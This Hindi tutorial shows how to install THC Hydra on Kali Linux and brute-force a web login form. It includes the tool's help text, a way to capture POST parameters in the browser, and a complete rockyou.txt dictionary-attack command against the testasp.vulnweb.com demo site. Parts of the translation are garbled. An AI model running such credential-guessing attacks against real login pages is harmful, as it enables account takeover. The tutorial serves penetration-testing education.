काली लिनक्स में हाइड्रा के साथ वेब आधारित लॉगिन पेज क्रैक करें

एक पासवर्ड को तकनीकी रूप से संसाधनों तक पहुंच को प्रमाणित करने या प्राप्त करने के लिए उपयोग किए जाने वाले वर्णों की गुप्त स्ट्रिंग के रूप में परिभाषित किया जाता है। इसे गुप्त रखा जाना चाहिए और उन लोगों से छुपाया जाना चाहिए जिन्हें उन संसाधनों तक पहुंचने की अनुमति नहीं है। कंप्यूटिंग के शुरुआती दिनों से ही कंप्यूटर के साथ पासवर्ड का इस्तेमाल किया जाता रहा है। पहली बार साझा करने वाली प्रणालियों में से एक, 1961 में पेश किया गया था। इसमें एक लॉगिन कमांड था जो एक उपयोगकर्ता पासवर्ड का अनुरोध करता था। पासवर्ड टाइप करने के बाद, यदि संभव हो तो सिस्टम प्रिंटिंग मैकेनिज्म को बंद कर देता है, ताकि उपयोगकर्ता गोपनीयता के साथ अपना पासवर्ड टाइप कर सके।

पासवर्ड की ताकत लंबाई, जटिलता और अप्रत्याशितता का एक कार्य है। यह अनुमान लगाने या इसे तोड़ने का विरोध करने में प्रभावशीलता को मापता है। दूसरी ओर, कमजोर पासवर्ड व्यक्तिगत/कॉर्पोरेट ई-मेल, वित्तीय जानकारी, व्यावसायिक जानकारी, क्रेडिट कार्ड आदि जैसे संवेदनशील डेटा का अनुमान लगाने और उन तक पहुंच प्राप्त करने के लिए आवश्यक समय को कम करते हैं।

विभिन्न हमले योजनाओं की ताकत शक्ति के अनुरूप पासवर्ड कमजोर होने के कई तरीके हैं। इस तरह के क्रेडेंशियल हमले में सबसे लोकप्रिय है, पाशविक बल। यह एक परीक्षण और त्रुटि विधि है जैसे अनुमान लगाना, एन्क्रिप्टेड डेटा को डीकोड करने का प्रयास जैसे पासवर्ड या डेटा एन्क्रिप्शन एप्लिकेशन प्रोग्राम या हैकिंग टूल द्वारा उपयोग किया जाता है।

हाइड्रा सबसे तेज़ नेटवर्क लॉगऑन क्रैकर है जो कई हमले प्रोटोकॉल का समर्थन करता है। यह बहुत तेज़ और लचीला है, और नए मॉड्यूल जोड़ना आसान है। यह उपकरण शोधकर्ताओं और सुरक्षा सलाहकारों के लिए यह दिखाना संभव बनाता है कि दूरस्थ रूप से किसी सिस्टम तक अनधिकृत पहुंच प्राप्त करना कितना आसान होगा। हाइड्रा वैन हॉसर द्वारा लिखा गया था और इसके अतिरिक्त डेविड मासीजैक द्वारा समर्थित था। नवीनतम अपडेट में हाइड्रा विकास को सार्वजनिक जीथब रिपॉजिटरी में ले जाया गया है: https://github.com/vanhauser-thc/thc-hydra।

हाइड्रा को लिनक्स, विंडोज/साइगविन, सोलारिस 11, फ्रीबीएसडी 8.1, ओपनबीएसडी, ओएसएक्स, क्यूएनएक्स/ब्लैकबेरी पर संकलित करने के लिए परीक्षण किया गया था और इसे विशेष ओपनएसएसएल लाइसेंस विस्तार के साथ जीपीएलवी3 के तहत उपलब्ध कराया गया है।

THC हाइड्रा इन प्रोटोकॉल का समर्थन करता है: सिस्को एएए, सिस्को ऑथ, सिस्को इनेबल, सीवीएस, एफ़टीपी, एचटीटीपी (एस) -फॉर्म-जीईटी, एचटीटीपी (एस) -फॉर्म-पोस्ट, एचटीटीपी (एस) -जीईटी, एचटीटीपी (एस) -हेड , HTTP-प्रॉक्सी, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle श्रोता, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rs, SIP, SMB (NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 और v2), SSHKEY, सबवर्जन, टीमस्पीक (TS2), टेलनेट, VMware-Auth, VNC और XMPP।

अन्य क्रैकिंग टूल्स के साथ हाइड्रा की तुलना करना

हाइड्रा के बगल में बहुत सारे लॉगिन क्रैकर टूल भी हैं, हालांकि कोई भी प्रोटोकॉल की एक विशाल सूची का समर्थन नहीं करता है और हाइड्रा जैसे समानांतर लॉगिन क्रैकर समर्थन करता है। नीचे दी गई सारणी मेडुसा और एनक्रैक के खिलाफ सुविधाओं, सेवाओं और गति तुलना का परिणाम दिखाती है।

विशेषताएं

सेवाएं

क्रैक वेब आधारित लॉगिन पेज के साथ

गति तुलना

यह हाइड्रा का संक्षिप्त सरल परिचय था। अब स्थापना पर चलते हैं।

हाइड्रा स्थापित करना

हाइड्रा काली लिनक्स पर पहले से स्थापित है, हालांकि यदि आपके पास एक अलग ऑपरेटिंग सिस्टम है तो आप इसे अपने सिस्टम पर संकलित और स्थापित कर सकते हैं। वर्तमान में, विभिन्न प्लेटफार्मों पर हाइड्रा का समर्थन:

• सभी यूनिक्स प्लेटफॉर्म (लिनक्स, *बीएसडी, सोलारिस, आदि)
• MacOS (मूल रूप से एक BSD क्लोन)
• सिगविन के साथ विंडोज़ (आईपीवी4 और आईपीवी6 दोनों)
• Linux, MacOS या QNX पर आधारित मोबाइल सिस्टम (जैसे Android, iPhone, ब्लैकबेरी 10, ज़ौरस, iPaq)

हाइड्रा को डाउनलोड करने, कॉन्फ़िगर करने, संकलित करने और स्थापित करने के लिए, बस टर्मिनल में टाइप करें:

git clone https://github.com/vanhauser-thc/thc-hydra.git cd thc-hydra ./configure make make install 

यदि आपके पास उबंटू/डेबियन है तो आपको कुछ निर्भरता पुस्तकालयों की आवश्यकता होगी:

apt install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncp-dev 

यदि आप उन पुस्तकालयों को अपने भंडार में नहीं ढूंढ पाए हैं, तो आपको उन्हें मैन्युअल रूप से डाउनलोड और इंस्टॉल करने की आवश्यकता है।

हाइड्रा का उपयोग कैसे करें

बधाई हो, अब आप अपने सिस्टम पर हाइड्रा स्थापित करने में सफल हो गए हैं। दरअसल, हाइड्रा दो फ्लेवर के साथ आता है, GUI-gtk और मेरा पसंदीदा, CLI संस्करण। और इसके अलावा हाइड्रा में सीएलआई निर्देशित संस्करण भी है, इसे हाइड्रा-विजार्ड कहा जाता है। टर्मिनल में मैन्युअल रूप से सभी कमांड या तर्क टाइप करने के बजाय आपको चरण-दर-चरण निर्देशित किया जाएगा। अपने टर्मिनल प्रकार से हाइड्रा चलाने के लिए:

सीएलआई के लिए:

hydra

सीएलआई-विज़ार्ड के लिए:

hydra-wizard

जीयूआई के लिए:

xhydra

आपके द्वारा 'हाइड्रा' टाइप करने के बाद यह इस तरह से हेल्प कमांड प्रदर्शित करेगा:

 [email protected] :~# hydra -h Hydra v8.6 (c)2017 by van Hauser/THC & David Maciejak - for legal purposes only Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]] Options: -R restore a previous aborted/crashed session -S perform an SSL connect -s PORT if the service is on a different default port, define it here -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -x MIN:MAX:CHARSET password bruteforce generation, type '-x -h' to get help -e nsr try 'n' null password, 's' login as pass and/or 'r' reversed login -u loop around users, not passwords (effective! implied with -x) -C FILE colon separated 'login:pass' format, instead of -L/-P options -M FILE list of servers to be attacked in parallel, one entry per line -o FILE write found login/password pairs to FILE instead of stdout -f / -F exit when a login/pass pair is found (-M: -f per host, -F global) -t TASKS run TASKS number of connects in parallel (per host, default: 16) -w / -W TIME waittime for responses (32s) / between connects per thread -4 / -6 prefer IPv4 (default) or IPv6 addresses -v / -V / -d verbose mode / show login+pass for each attempt / debug mode -U service module usage details server the target server (use either this OR the -M option) service the service to crack (see below for supported protocols) OPT some service modules support additional input (-U for module help) Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-head http[s]-post-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-crammd5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp Hydra is a tool to guess/crack valid login/password pairs - usage only allowed for legal purposes. This tool is licensed under AGPL v3.0. The newest version is always available at http://www.thc.org/thc-hydra These services were not compiled in: sapr3 oracle. Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup. E.g.: % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://) % export HYDRA_PROXY_HTTP=http://proxy:8080 % export HYDRA_PROXY_AUTH=user:pass Examples: hydra -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5 hydra -l admin -p password ftp://[192.168.0.0/24]/ hydra -L logins.txt -P pws.txt -M targets.txt ssh

हाइड्रा के साथ Bruteforce वेब आधारित लॉगिन

जैसा कि मैंने पहले उल्लेख किया है, हाइड्रा कुछ ब्रूटफोर्सिंग सेवा का समर्थन करता है, उनमें से एक का उपयोग वेब आधारित लॉगिन जैसे, सोशल मीडिया लॉगिन फॉर्म, उपयोगकर्ता बैंकिंग लॉगिन फॉर्म, आपका राउटर वेब आधारित लॉगिन, आदि के लिए किया जाता है। वह http [s] -get-form जो इस अनुरोध को संभालेगा। इस ट्यूटोरियल में मैं आपको दिखाने जा रहा हूँ कि कैसे कमजोर वेब लॉग इन को जबरदस्ती किया जाए। इससे पहले कि हम हाइड्रा को चालू करें, हमें नीचे कुछ आवश्यक तर्कों को जानना चाहिए:

• लक्ष्य : http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F
• लॉग इन यूज़रनेम : व्यवस्थापक (यदि आप निश्चित नहीं हैं, तो इसे जबरदस्ती करें)
• पासवर्ड सूची : संभावित पासवर्ड वाली शब्दकोश फ़ाइल सूची का स्थान।
• फॉर्म पैरामीटर : सामान्य तौर पर, अनुरोध पैरामीटर के रूप को प्राप्त करने के लिए छेड़छाड़ डेटा या प्रॉक्सी का उपयोग करें। लेकिन यहाँ मैं Iceweasel, Firefox आधारित, नेटवर्क डेवलपर टूलबार का उपयोग कर रहा हूँ।
• सेवा मॉड्यूल : http-पोस्ट-फॉर्म

Help for module http-post-form: ============================================================================ Module http-post-form requires the page and the parameters for the web form. By default this module is configured to follow a maximum of 5 redirections in a row. It always gathers a new cookie from the same URL without variables The parameters take three ':' separated values, plus optional values. (Note: if you need a colon in the option string as value, escape it with ':', but do not escape a '' with '\'.) Syntax: [url]:[form parameters]:[condition string][:(optional)[:(optional)] First is the page on the server to GET or POST to (URL). Second is the POST/GET variables (taken from either the browser, proxy, etc. with usernames and passwords being replaced in the '^USER^' and '^PASS^' placeholders (FORM PARAMETERS) Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by 'F=', successful condition login check must be preceded by 'S='. This is where most people get it wrong. You have to check the webapp what a failed string looks like and put it in this parameter! The following parameters are optional: C=/page/uri to define a different page to gather initial cookies from (h|H)=My-Hdr: foo to send a user defined HTTP header with each request ^USER^ and ^PASS^ can also be put into these headers! Note: 'h' will add the user-defined header at the end regardless it's already being sent by Hydra or not. 'H' will replace the value of that header if it exists, by the one supplied by the user, or add the header at the end Note that if you are going to put colons (:) in your headers you should escape them with a backslash (). All colons that are not option separators should be escaped (see the examples above and below). You can specify a header without escaping the colons, but that way you will not be able to put colons in the header value itself, as they will be interpreted by hydra as option separators.

ब्राउज़र, Iceweasel/फ़ायरफ़ॉक्स का उपयोग करके पोस्ट पैरामीटर प्राप्त करना

अपने फ़ायरफ़ॉक्स ब्राउज़र में कुंजियाँ दबाएँ ' CTRL + SHIFT + Q '। फिर वेब लॉगिन पेज खोलेंhttp://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F, आप देखेंगे कि नेटवर्क डेवलपर टैब पर कुछ टेक्स्ट दिखाई दे रहे हैं। यह आपको बताता है कि हमें कौन सी फाइलें स्थानांतरित की जाती हैं। देखें कि सभी GET हैं, क्योंकि हमने अभी तक कोई डेटा पोस्ट नहीं किया है।

पोस्ट-फॉर्म पैरामीटर प्राप्त करने के लिए, उपयोगकर्ता नाम और पासवर्ड फॉर्म में जो कुछ भी टाइप करें। आप नेटवर्क डेवलपर टैब पर एक नई POST विधि देखेंगे। उस लाइन पर डबल क्लिक करें, हेडर टैब पर राइट-साइड पर एडिट एंड रीसेंड बटन पर क्लिक करें। अनुरोध निकाय पर अंतिम पंक्ति की प्रतिलिपि बनाएँ, जैसे tfUName = asu और tfUPass = raimu . NS tfUName तथा टीएफयूपास वे पैरामीटर हैं जिनकी हमें आवश्यकता है। जैसा कि नीचे देखा गया है:

Kali linux में कई शब्द सूचियाँ हैं, उपयुक्त शब्द सूची चुनें या केवल Rockyou.txt जगह का उपयोग करें /usr/शेयर/वर्डलिस्ट/ जैसा कि नीचे देखा गया है:

ठीक है, अब हमारे पास वे सभी तर्क हैं जिनकी हमें आवश्यकता है और हाइड्रा को आग लगाने के लिए तैयार हैं। यहाँ कमांड पैटर्न है:

hydra -l -P [/code] Finally, based on information we have gathered, our commands ahould look something like this: hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form '/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout' -vV -f

आइए आदेशों को तोड़ें:

• NS : उपयोगकर्ता नाम खाता युक्त एक शब्द है, फ़ाइल में संभावित उपयोगकर्ता नाम की सूची को संदर्भित करने के लिए -L का उपयोग करें।
• पी : संभावित पासवर्ड की एक फ़ाइल सूची है, इसका अनुमान लगाने के बजाय शाब्दिक रूप से एक शब्द पासवर्ड का उपयोग करने के लिए -p का उपयोग करें।
• testapp.vunlwebapp.com : एक होस्टनाम या लक्ष्य है
• http-पोस्ट-फॉर्म : वह सेवा मॉड्यूल है जिसका हम उपयोग करते हैं
• /Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout = 3 मापदंडों की जरूरत है, वाक्य रचना है:
  {पृष्ठ URL}:{अनुरोध पोस्ट बॉडी फॉर्म पैरामीटर}:S={सफलतापूर्वक लॉग इन करने के बाद पृष्ठ में जो कुछ भी खोजें}
• वी = वर्बोज़ मोड
• वी = लॉगिन दिखाएं: प्रत्येक प्रयास के लिए पास करें
• एफ = यदि जोड़ी लॉगिन: पासवर्ड मिल गया है तो प्रोग्राम समाप्त करें

आइए अब हाइड्रा को हमारे लिए पासवर्ड तोड़ने की कोशिश करते हैं, इसे समय चाहिए क्योंकि यह एक शब्दकोश हमला है। एक बार जब आप लॉगिन की एक जोड़ी खोजने में सफल हो जाते हैं: पासवर्ड हाइड्रा तुरंत नौकरी समाप्त कर देगा और वैध क्रेडेंशियल दिखाएगा।

हाइड्रा बहुत कुछ कर सकता है, क्योंकि इस ट्यूटोरियल में हमने अभी सीखा कि कैसे हाइड्रा का उपयोग करके वेब आधारित लॉगऑन को ब्रूटफोर्स करना है, हम केवल एक प्रोटोकॉल सीखते हैं, वह है http-post-form प्रोटोकॉल। हम एक अन्य प्रोटोकॉल जैसे ssh, ftp, टेलनेट, VNC, प्रॉक्सी, आदि के विरुद्ध भी हाइड्रा का उपयोग कर सकते हैं।